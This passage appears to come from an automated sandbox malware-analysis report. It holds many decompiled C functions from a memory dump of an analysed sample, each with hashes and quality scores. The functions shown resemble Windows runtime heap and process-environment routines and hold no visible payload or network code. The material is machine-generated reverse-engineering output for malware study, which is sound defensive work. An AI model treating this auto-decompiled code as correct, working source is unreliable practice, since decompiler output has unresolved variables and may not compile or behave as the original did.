                                                                                                            • Instruction Fuzzy Hash: 86F05930908149EACF4AB77CC840BBD7FF1AF00294F245199D8E1A7069EF648800CB86
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 36%
                                                                                                            			E01138CD6(intOrPtr __ecx) {
                                                                                                            				signed int _v8;
                                                                                                            				intOrPtr _v12;
                                                                                                            				short _v38;
                                                                                                            				char _v44;
                                                                                                            				signed char* _t11;
                                                                                                            				intOrPtr _t17;
                                                                                                            				intOrPtr _t22;
                                                                                                            				intOrPtr _t23;
                                                                                                            				intOrPtr _t24;
                                                                                                            				signed int _t25;
                                                                                                            
                                                                                                            				_v8 =  *0x115d360 ^ _t25;
                                                                                                            				_v12 = __ecx;
                                                                                                            				_v38 = 0x1c2d;
                                                                                                            				if(E01087D50() == 0) {
                                                                                                            					_t11 = 0x7ffe0386;
                                                                                                            				} else {
                                                                                                            					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                                            				}
                                                                                                            				_push( &_v44);
                                                                                                            				_push(0xffffffe4);
                                                                                                            				_push(0x402);
                                                                                                            				_push( *_t11 & 0x000000ff);
                                                                                                            				return E010AB640(E010A9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                                                                                                            			}














                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d4233bfea432c69befaddd46f6c02587decb8bdd3a5709f46bcf2e6eeedaaf99
                                                                                                            • Instruction ID: b2eddc3482408abba154220d4700e3b2c7b3e14e9a17ac413787725cd38cb397
                                                                                                            • Opcode Fuzzy Hash: d4233bfea432c69befaddd46f6c02587decb8bdd3a5709f46bcf2e6eeedaaf99
                                                                                                            • Instruction Fuzzy Hash: 78F08270A04209ABDB08EBF8E945EAE77B4EF58200F500199F955EB285EA34D900C754
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E01064F2E(void* __ecx, char _a4) {
                                                                                                            				void* __esi;
                                                                                                            				void* __ebp;
                                                                                                            				void* _t17;
                                                                                                            				void* _t19;
                                                                                                            				void* _t20;
                                                                                                            				void* _t21;
                                                                                                            
                                                                                                            				_t18 = __ecx;
                                                                                                            				_t21 = __ecx;
                                                                                                            				if(__ecx == 0) {
                                                                                                            					L6:
                                                                                                            					__eflags = _a4;
                                                                                                            					if(__eflags != 0) {
                                                                                                            						L8:
                                                                                                            						E011388F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                                                                                                            						L9:
                                                                                                            						return 0;
                                                                                                            					}
                                                                                                            					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                                                                                            					if(__eflags != 0) {
                                                                                                            						goto L9;
                                                                                                            					}
                                                                                                            					goto L8;
                                                                                                            				}
                                                                                                            				_t18 = __ecx + 0x30;
                                                                                                            				if(E0108C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x1041030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                                                                                            					goto L6;
                                                                                                            				} else {
                                                                                                            					return 1;
                                                                                                            				}
                                                                                                            			}










                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 55f0776113b6622b2b3da9b10dafc0030e129a5304ca506f666ff9171c30be20
                                                                                                            • Instruction ID: c7441a7790afcf0b0a61594628c673fb0738da9f8f42bb83b79af6b528152746
                                                                                                            • Opcode Fuzzy Hash: 55f0776113b6622b2b3da9b10dafc0030e129a5304ca506f666ff9171c30be20
                                                                                                            • Instruction Fuzzy Hash: 48F0E939516694CFD7B1DB1CC244B1A77E8AB00B7CF0485F8F58587555C734EC84CA50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0109A44B(signed int __ecx) {
                                                                                                            				intOrPtr _t13;
                                                                                                            				signed int _t15;
                                                                                                            				signed int* _t16;
                                                                                                            				signed int* _t17;
                                                                                                            
                                                                                                            				_t13 =  *0x1157b9c; // 0x0
                                                                                                            				_t15 = __ecx;
                                                                                                            				_t16 = L01084620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
                                                                                                            				if(_t16 == 0) {
                                                                                                            					return 0;
                                                                                                            				}
                                                                                                            				 *_t16 = _t15;
                                                                                                            				_t17 =  &(_t16[2]);
                                                                                                            				E010AFA60(_t17, 0, _t15 << 2);
                                                                                                            				return _t17;
                                                                                                            			}








                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 443cde448be8b4f0d66db654adac1dded066c4400f04cd30ac6c5a790e39c573
                                                                                                            • Instruction ID: d30e4e2526ea3b96d700c04f680f59f4113f0311a48b273fb2f42a8bf313a1ce
                                                                                                            • Opcode Fuzzy Hash: 443cde448be8b4f0d66db654adac1dded066c4400f04cd30ac6c5a790e39c573
                                                                                                            • Instruction Fuzzy Hash: 99E09272B01422EBD3215A58AC00FAB739DDBE4A51F0A4035E684C7254DA68DD11C7E0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 79%
                                                                                                            			E0106F358(void* __ecx, signed int __edx) {
                                                                                                            				char _v8;
                                                                                                            				signed int _t9;
                                                                                                            				void* _t20;
                                                                                                            
                                                                                                            				_push(__ecx);
                                                                                                            				_t9 = 2;
                                                                                                            				_t20 = 0;
                                                                                                            				if(E0109F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
                                                                                                            					_t20 = L01084620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                                                                                                            				}
                                                                                                            				return _t20;
                                                                                                            			}







                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                                                            • Instruction ID: 04d0777587319ca8aae6356e9bf57466e5a8d65e82747ad2ee227c039eb95815
                                                                                                            • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                                                            • Instruction Fuzzy Hash: 47E02032A40229FBDB31A6DD9D15F9BBFFCDB58AA0F008195FA44D7150D5759D00D2D0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0107FF60(intOrPtr _a4) {
                                                                                                            				void* __ecx;
                                                                                                            				void* __ebp;
                                                                                                            				void* _t13;
                                                                                                            				intOrPtr _t14;
                                                                                                            				void* _t15;
                                                                                                            				void* _t16;
                                                                                                            				void* _t17;
                                                                                                            
                                                                                                            				_t14 = _a4;
                                                                                                            				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x10411a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                                                                                            					return E011388F5(_t13, _t14, _t15, _t16, _t17, __eflags);
                                                                                                            				} else {
                                                                                                            					return E01080050(_t14);
                                                                                                            				}
                                                                                                            			}











                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d2cb423b5496e1ec6b0b58bf1ffc21d8b07f4d2c9802e917ab18f4bda6ad197d
                                                                                                            • Instruction ID: 9bc27d83db5cbf39e9ddcd5746ec0ac77250094ed6f5ebb9a94945af31d4076e
                                                                                                            • Opcode Fuzzy Hash: d2cb423b5496e1ec6b0b58bf1ffc21d8b07f4d2c9802e917ab18f4bda6ad197d
                                                                                                            • Instruction Fuzzy Hash: E4E0D8B0909206DFD735D759D040F1537DC9F51621F19409DF09887502CA61F881C68D
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 82%
                                                                                                            			E010F41E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                            				void* _t5;
                                                                                                            				void* _t14;
                                                                                                            
                                                                                                            				_push(8);
                                                                                                            				_push(0x11408f0);
                                                                                                            				_t5 = E010BD08C(__ebx, __edi, __esi);
                                                                                                            				if( *0x11587ec == 0) {
                                                                                                            					E0107EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                                                            					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
                                                                                                            					if( *0x11587ec == 0) {
                                                                                                            						 *0x11587f0 = 0x11587ec;
                                                                                                            						 *0x11587ec = 0x11587ec;
                                                                                                            						 *0x11587e8 = 0x11587e4;
                                                                                                            						 *0x11587e4 = 0x11587e4;
                                                                                                            					}
                                                                                                            					 *(_t14 - 4) = 0xfffffffe;
                                                                                                            					_t5 = L010F4248();
                                                                                                            				}
                                                                                                            				return E010BD0D1(_t5);
                                                                                                            			}






                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0111D380(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                            				void* _t5;
                                                                                                            
                                                                                                            				if(_a4 != 0) {
                                                                                                            					_t5 = L0106E8B0(__ecx, _a4, 0xfff);
                                                                                                            					L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                                                                                            					return _t5;
                                                                                                            				}
                                                                                                            				return 0xc000000d;
                                                                                                            			}





                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0109A185() {
                                                                                                            				void* __ecx;
                                                                                                            				intOrPtr* _t5;
                                                                                                            
                                                                                                            				if( *0x11567e4 >= 0xa) {
                                                                                                            					if(_t5 < 0x1156800 || _t5 >= 0x1156900) {
                                                                                                            						return L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
                                                                                                            					} else {
                                                                                                            						goto L1;
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					L1:
                                                                                                            					return E01080010(0x11567e0, _t5);
                                                                                                            				}
                                                                                                            			}






                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E010916E0(void* __edx, void* __eflags) {
                                                                                                            				void* __ecx;
                                                                                                            				void* _t3;
                                                                                                            
                                                                                                            				_t3 = E01091710(0x11567e0);
                                                                                                            				if(_t3 == 0) {
                                                                                                            					_t6 =  *[fs:0x30];
                                                                                                            					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
                                                                                                            						goto L1;
                                                                                                            					} else {
                                                                                                            						return L01084620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					L1:
                                                                                                            					return _t3;
                                                                                                            				}
                                                                                                            			}






                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E010E53CA(void* __ebx) {
                                                                                                            				intOrPtr _t7;
                                                                                                            				void* _t13;
                                                                                                            				void* _t14;
                                                                                                            				intOrPtr _t15;
                                                                                                            				void* _t16;
                                                                                                            
                                                                                                            				_t13 = __ebx;
                                                                                                            				if( *((char*)(_t16 - 0x65)) != 0) {
                                                                                                            					E0107EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                                                            					_t7 =  *((intOrPtr*)(_t16 - 0x64));
                                                                                                            					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
                                                                                                            				}
                                                                                                            				if(_t15 != 0) {
                                                                                                            					L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
                                                                                                            					return  *((intOrPtr*)(_t16 - 0x64));
                                                                                                            				}
                                                                                                            				return _t7;
                                                                                                            			}









                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0107AAB0() {
                                                                                                            				intOrPtr* _t4;
                                                                                                            
                                                                                                            				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                                                                                            				if(_t4 != 0) {
                                                                                                            					if( *_t4 == 0) {
                                                                                                            						goto L1;
                                                                                                            					} else {
                                                                                                            						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					L1:
                                                                                                            					return 0x7ffe0030;
                                                                                                            				}
                                                                                                            			}





                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E010935A1(void* __eax, void* __ebx, void* __ecx) {
                                                                                                            				void* _t6;
                                                                                                            				void* _t10;
                                                                                                            				void* _t11;
                                                                                                            
                                                                                                            				_t10 = __ecx;
                                                                                                            				_t6 = __eax;
                                                                                                            				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
                                                                                                            					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
                                                                                                            				}
                                                                                                            				if( *((char*)(_t11 - 0x1a)) != 0) {
                                                                                                            					return E0107EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                                                            				}
                                                                                                            				return _t6;
                                                                                                            			}







                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                                                            • Instruction ID: b97df5b90ce8316a5ec0cef717cf7897a7fcddc6cdc0a7f5f30a5b8cf28e9d76
                                                                                                            • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                                                            • Instruction Fuzzy Hash: 38D0A73140118199DF41AB34C1347ACBBB1BB04208F58109580C14D452C3354909EE00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0106DB40() {
                                                                                                            				signed int* _t3;
                                                                                                            				void* _t5;
                                                                                                            
                                                                                                            				_t3 = L01084620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
                                                                                                            				if(_t3 == 0) {
                                                                                                            					return 0;
                                                                                                            				} else {
                                                                                                            					 *_t3 =  *_t3 | 0x00000400;
                                                                                                            					return _t3;
                                                                                                            				}
                                                                                                            			}






                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                                                            • Instruction ID: a3fc93c97cee1e92019466338946254908cda779f93e432c4810c81cb52af119
                                                                                                            • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                                                            • Instruction Fuzzy Hash: EAC08C30380A02EAEB222F20DD01B403AA4BB50B05F4400A06380DA0F0EBB8D811E600
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E010EA537(intOrPtr _a4, intOrPtr _a8) {
                                                                                                            
                                                                                                            				return L01088E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
                                                                                                            			}




                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                                                            • Instruction ID: 4b182943ed567ef56e3f1e893774970dfc25026635c32f950dccb804be7d47bb
                                                                                                            • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                                                            • Instruction Fuzzy Hash: 41C08C37080248BBCB127F81CC00F467F2AFBA4B60F008011FA880B5B0C632E970EB84
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E01083A1C(intOrPtr _a4) {
                                                                                                            				void* _t5;
                                                                                                            
                                                                                                            				return L01084620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                                                                                            			}





                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                                                            • Instruction ID: 87f70e49f1ae9875a8b6b70cf3d510c87db5367ec17f8ea1641e53382d5dcf34
                                                                                                            • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                                                            • Instruction Fuzzy Hash: 46C08C32080248BBC7126E41DC00F017B29E7A4B60F000020B6440A5608672EC60D588
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0106AD30(intOrPtr _a4) {
                                                                                                            
                                                                                                            				return L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                                                                                            			}




                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                                                            • Instruction ID: d3092a878f0a19596f2ff0034b5edafcd52924297e21502dedf40a5c039d80f1
                                                                                                            • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                                                            • Instruction Fuzzy Hash: 73C08C32080248BBC7127A45CD00F017B29E7A0B60F100020F6440A6618932E860D588
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E010936CC(void* __ecx) {
                                                                                                            
                                                                                                            				if(__ecx > 0x7fffffff) {
                                                                                                            					return 0;
                                                                                                            				} else {
                                                                                                            					return L01084620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                                                                                                            				}
                                                                                                            			}




                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                                                                            • Instruction ID: c39504993a0d9e228f9f9d0c1713edf365089c1c5151689957bf73ca43fef83e
                                                                                                            • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                                                                            • Instruction Fuzzy Hash: 74C02B74154440FBDB252F30CD10F147294F704A21F6403947260894F0E6689C10E500
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E010776E2(void* __ecx) {
                                                                                                            				void* _t5;
                                                                                                            
                                                                                                            				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
                                                                                                            					return L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                                                                                                            				}
                                                                                                            				return _t5;
                                                                                                            			}





                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                                                            • Instruction ID: a1578c75ebad91f836d204fcbe004d3fc5fe67d7cd44331c6b0cc6b7d7995cb7
                                                                                                            • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                                                            • Instruction Fuzzy Hash: 2FC08C705411805AEB2A670CCE28B203A90BB0C648F5801DCEBC1094A6C368A823C20C
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E01087D50() {
                                                                                                            				intOrPtr* _t3;
                                                                                                            
                                                                                                            				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                                                                                            				if(_t3 != 0) {
                                                                                                            					return  *_t3;
                                                                                                            				} else {
                                                                                                            					return _t3;
                                                                                                            				}
                                                                                                            			}





                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                                                            • Instruction ID: 047506447a82e250eaa45c9367d45349be0243d32edce0a4aea07f373ee4d66c
                                                                                                            • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                                                            • Instruction Fuzzy Hash: 2AB09235301A408FCE56EF18C080B1533F4BB44A40B9400D0E440CBA21D229E8008900
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E01092ACB() {
                                                                                                            				void* _t5;
                                                                                                            
                                                                                                            				return E0107EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                                                            			}





                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                                                            • Instruction ID: 34ddbf88ec92e07681752044e157eebf659b1927af552b079c22cbdf05f7c023
                                                                                                            • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                                                            • Instruction Fuzzy Hash: 53B01232C11441CFCF02EF40CA10B6A7731FB40750F0544D1900127930C228AC01CB40
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a9b07947780277ea6c89fa34aada6ff2e69e41d76d2d36213f96c22c2f39982d
                                                                                                            • Instruction ID: 411590eb4bf11b98f1e2a038e7b3b566f92a44de3398cf7810ee0d8720f72510
                                                                                                            • Opcode Fuzzy Hash: a9b07947780277ea6c89fa34aada6ff2e69e41d76d2d36213f96c22c2f39982d
                                                                                                            • Instruction Fuzzy Hash: 2A90027120100903D140619995487474105E7D0245F51D421A0814558DD69698517261
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c17cd4270bd218e317d9f58664e68725ac3e89e2abf0afbee1502e96da568422
                                                                                                            • Instruction ID: 6a6499bddc2c82ada73bf48c9583af1f26d91ffaa7b47e2084af9a1b4ce95970
